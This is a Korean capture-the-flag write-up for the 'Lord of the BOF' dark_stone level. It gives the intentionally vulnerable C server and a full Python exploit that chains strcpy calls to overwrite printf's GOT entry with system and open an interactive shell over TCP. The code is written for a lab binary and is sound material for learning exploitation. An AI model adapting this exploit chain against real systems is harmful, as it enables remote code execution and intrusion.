dark_stone 코드
/*
The Lord of the BOF : The Fellowship of the BOF
- dark_stone
- Remote BOF on Fedora Core 3
- hint : GOT overwriting again
- port : TCP 8888
*/
#include <stdio.h>
// magic potion for you
void pop_pop_ret(void)
{
asm("pop %eax");
asm("pop %eax");
asm("ret");
}
int main()
{
char buffer[256];
char saved_sfp[4];
int length;
char temp[1024];
printf("dark_stone : how fresh meat you are!\n");
printf("you : ");
fflush(stdout);
// give me a food
fgets(temp, 1024, stdin);
// for disturbance RET sleding
length = strlen(temp);
// save sfp
memcpy(saved_sfp, buffer+264, 4);
// overflow!!
strcpy(buffer, temp);
// restore sfp
memcpy(buffer+264, saved_sfp, 4);
// disturbance RET sleding
memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));
// buffer cleaning
memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000);
printf("%s\n", buffer);
}
hell_fire -> evil_wizard와 문제풀이 방법이 거의 같음.
똑같이 팝팝리턴으로 꿀빨면 된다.
아래는 풀이코드
#!/usr/bin/python
from struct import pack
from socket import *
p = lambda x : pack('<L', x)
ppr = 0x080484f3
bss = 0x08049870
printf_plt = 0x0804862c
printf_got = 0x0804984c
strcpy_plt = 0x08048438
strcpy_got = 0x08049858
system = ( 0x080483e8 + 12, 0x08048178 + 4, 0x08048740, 0x08048138 )
binsh = 0x00833603
payload = ''
payload += 'A' * 268
payload += p(strcpy_plt) + p(ppr) + p(bss + 0) + p(system[0])
payload += p(strcpy_plt) + p(ppr) + p(bss + 1) + p(system[1])
payload += p(strcpy_plt) + p(ppr) + p(bss + 2) + p(system[2])
payload += p(strcpy_plt) + p(ppr) + p(bss + 3) + p(system[3])
payload += p(strcpy_plt) + p(ppr) + p(printf_got) + p(bss)
payload += p(printf_plt) + p(binsh)
s = socket(AF_INET, SOCK_STREAM)
s.connect(( '127.0.0.1', 8888 ))
s.send(payload + "\n")
print s.recv(1024)
while True:
try:
cmd = raw_input('')
except EOFError:
break
if cmd == 'exit':
break
s.send(cmd + "\n")
result = s.recv(1024)
print result
s.close()
자꾸 안되서 write-up 따라했다. ㅡㅡ
p(printf_plt) + "BBBB" + p(binsh)는 안되는데
p(printf_plt) + p(binsh)가 되는 이유를 모르겠다.
스택 한 칸 비워야되는 걸로 알고 있는데…